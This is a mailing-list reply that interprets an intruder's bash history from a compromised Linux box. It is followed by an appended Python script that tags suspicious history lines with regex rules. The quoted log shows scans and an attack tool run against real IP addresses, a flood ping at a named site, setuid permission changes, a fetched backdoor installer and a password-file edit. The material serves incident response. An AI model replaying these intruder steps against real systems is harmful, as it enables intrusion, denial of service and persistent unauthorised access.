
Re: bash_history from Cracked Computer



Dzuy M. Nguyen wrote:
> Can someone help me figure out this "/.bash_history" from my
> computer that someone cracked into and did some damage.
> 
> I'll probably re-install the box, but I'd like to see what they did
> before I destroy it.  I've attached the "/.bash_history".

Let's cut it down some..

> cc anatomy.c -o anatomy
> cc kod.c -o kofd
> cp kofd kod
> rm kofd

According to Google, kod and kofd are related to the Oracle database.
It's possible this is a coincidence, or he was using these names to try
to appear innocuous (weird choices though; 'sh' is better..)

It's odd he made them and immediately deleted them -- unless he was
logged in twice and went and used them in between.

> ./anatomy 216.209.196.154 22
> ./anatomy 216.209.205.68 22
> ./anatomy 216.209.207.150 22

I'd guess anatomy is some kind of port scanner. 22 is the ssh port.

> tar -zxvf bnc2_6_4_tar.gz
> cd bnc2.6.4
> ./configure
> make
> make install

bnc2 is an IRC proxy server. Its home page is http://bnc.dragondata.com/,
and a file with the same name as the one he untarred is at
http://bnc.dragondata.com/

> cd small
> mkdir .shit
> cd .shit
> chmod 777 *
> chmod +s *
> chmod 666 *
> chmod 777 *

I'd assume he is ftping or scping files (or something similar) onto your
box, since files seem to have just appeared here. Probably ftp, since the
permissions had to be fixed up. Might be useful to see if anything
shows up in the logs for daemons that can transfer files.

> ./pscan
> ./b
> ./pscan 167.64 111

Presumably a port scanner that operates on whole networks. Port 111 is
the Sun RPC port, so he's probably interested in nfs exploits or related
things here.

> ./pscan 195.54 111
> cat wuftp.log
> ./b 195.54.3.134
> ./b 195.54.29.7
> ./b 195.54.221.21

It looks like 'b' is his mode of attack after he portscans and finds new
victims.

> ping -f newsforlinux.com

A little malicious flood pinging always brightens up the day..

> ftp columbia.digiweb.com
> tar -zxvf linux.tar.gz
> cd .bd
> ./install

Hm. Since columbia.digiweb.com has no open ftp server, or kernel mirror
that I can see, I doubt this is really the kernel.

> cat /etc/passwd
> pico /ec/passwd
> cat .bash_history
> passwd z
> cat /etc/passwd

Adds a user; be sure to delete that user immediately... Of course, you
probably want to back up the system and reinstall from scratch.

-- 
see shy jo
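As an added example (not part of this thread), here is a small triage script in the spirit of the walkthrough above: it tags each history line with the category the reply reasons about (compiling tools, running them against addresses, permission changes, flood pings, account changes, file transfers, reading the history). The sample history, rule list and function names are my own; 192.0.2.10 is a documentation-range address and example.invalid a placeholder host.

```python
import re
from collections import Counter

# Constructed sample history, modelled on the kinds of lines discussed in the thread
# (192.0.2.10 is a documentation-range address; example.invalid is a placeholder host).
SAMPLE_HISTORY = """\
cc anatomy.c -o anatomy
./anatomy 192.0.2.10 22
tar -zxvf bnc2_6_4_tar.gz
chmod +s *
chmod 777 *
ping -f example.invalid
pico /etc/passwd
passwd z
ls -la
cat .bash_history
"""

# (regex, tag, what a responder should follow up on); the first matching rule wins.
RULES = [
    (r"^(cc|gcc|make)\b", "compile", "tools built locally; look for the sources and binaries left behind"),
    (r"^\./\S+\s+\d{1,3}(\.\d{1,3}){1,3}(\s+\d+)?", "scan/attack", "home-built binary run against an address (and port)"),
    (r"^chmod\s+(\S*\+s|[4-7][0-7]{3}|[0-7]?[0-7]{2}[2367])(\s|$)", "perms", "setuid or world-writable mode set; find the files"),
    (r"^ping\s+-f\b", "flood", "flood ping aimed at a remote host"),
    (r"^(pico|vi|vim|nano)\s+/etc/passwd|^passwd\s+\S+|^useradd\b", "account", "password file edited; compare /etc/passwd to a backup"),
    (r"^tar\s+-?\S*x|^(ftp|wget|scp)\s", "transfer", "archive unpacked or file fetched; check ftp/ssh daemon logs"),
    (r"^cat\s+\.bash_history$", "anti-forensics", "intruder read the history; treat it as possibly edited"),
]

def triage_history(text):
    """Return (lineno, command, tag, note) for each history line that matches a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = line.strip()
        for pattern, tag, note in RULES:
            if re.search(pattern, cmd):
                hits.append((n, cmd, tag, note))
                break  # one tag per line; unmatched lines (e.g. plain 'ls') are skipped
    return hits

def summarize(hits):
    """Count matched lines per tag, giving a quick picture of what the intruder did."""
    return dict(Counter(tag for _, _, tag, _ in hits))

if __name__ == "__main__":
    found = triage_history(SAMPLE_HISTORY)
    for n, cmd, tag, note in found:
        print(f"{n:3d} [{tag}] {cmd}: {note}")
    print(summarize(found))
```

Feed it the real file with `triage_history(open("/.bash_history").read())`; the output is a starting point for the log checks the reply suggests, not a verdict, since an intruder who reads the history can also edit it.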
